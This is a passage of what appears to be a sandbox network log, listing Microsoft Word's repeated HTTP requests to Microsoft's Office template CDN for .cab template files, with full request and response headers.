      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851219.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31605
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
      Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
      ETag: 0x8D36AC8822FFB6E
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 550906
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
      Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
      ETag: 0x8D60DDC2BE7DF3C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0414ccae-601e-0011-165a-b9109e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851218.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31835
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
      Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
      ETag: 0x8D36AC881E66CE5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 698244
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
      Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
      ETag: 0x8D60DDB6CAEA91D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d7c59a99-101e-0021-318b-c7a43e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851220.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31482
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
      Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
      ETag: 0x8D36AC8827914A7
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6af291c5-801e-0036-306e-a9075a000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03998159.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 3417042
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
      Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
      ETag: 0x8D36AC8BD7E1FE9
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c28a3f34-b01e-00c9-0497-a037c7000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851221.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31562
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
      Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
      ETag: 0x8D36AC882C4ED43
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1097591
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
      Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
      ETag: 0x8D60DDB7EAA50F0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4b5a1384-701e-0032-6dfb-b98a5d000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851222.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 28911
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: bXh7HiI9trkbaSOAYsyocg==
      Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
      ETag: 0x8D36AC8830E54C8
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 2bee5db1-501e-00ee-2682-b92003000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 230916
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
      Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
      ETag: 0x8D5E78DC0BDFFD8
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b597281b-e01e-00c0-4097-a0b22d000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851223.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 32833
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
      Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
      ETag: 0x8D36AC88357BC32
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 1e858e71-b01e-0028-5118-2de1ed000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1766185
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: go+WAx9Av468teUqrut+TA==
      Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
      ETag: 0x8D60DDC4354B7FB
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: a3240f77-901e-0000-474a-3a8045000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851225.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31008
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
      Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
      ETag: 0x8D36AC883F49D7D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b3f59ba9-f01e-00aa-4597-a0aa3c000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851224.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 30957
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 08kDbk4RWegysbTS6dQr8A==
      Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
      ETag: 0x8D36AC883A171B7
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7a3535a8-301e-0103-55f4-b69543000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851227.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 31471
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: karb7EFxz6gpK2GEkvXvNA==
      Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
      ETag: 0x8D36AC8848A0495
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c81084a1-301e-0023-0625-b910e9000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1310275
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
      Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
      ETag: 0x8D60DDBA5EDDA1A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ef258b2c-c01e-001b-4d97-a016fb000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 307348
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
      Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
      ETag: 0x8D60DDC169CBCB0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 875b64ee-b01e-0079-1097-a05123000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851226.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 35519
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
      Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
      ETag: 0x8D36AC88440C433
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 19a4e9a0-101e-0104-7797-a0f920000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 723359
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
      Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
      ETag: 0x8D60DDB43B59EC5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b73fb8ce-601e-005c-4e97-a0df72000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328884.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22008
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
      Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
      ETag: 0x8D36AC8987823BE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: f3206081-b01e-0002-7f97-a03492000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328905.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20457
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
      Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
      ETag: 0x8D36AC886167DDF
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 3e37f31b-801e-0044-5062-b90015000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
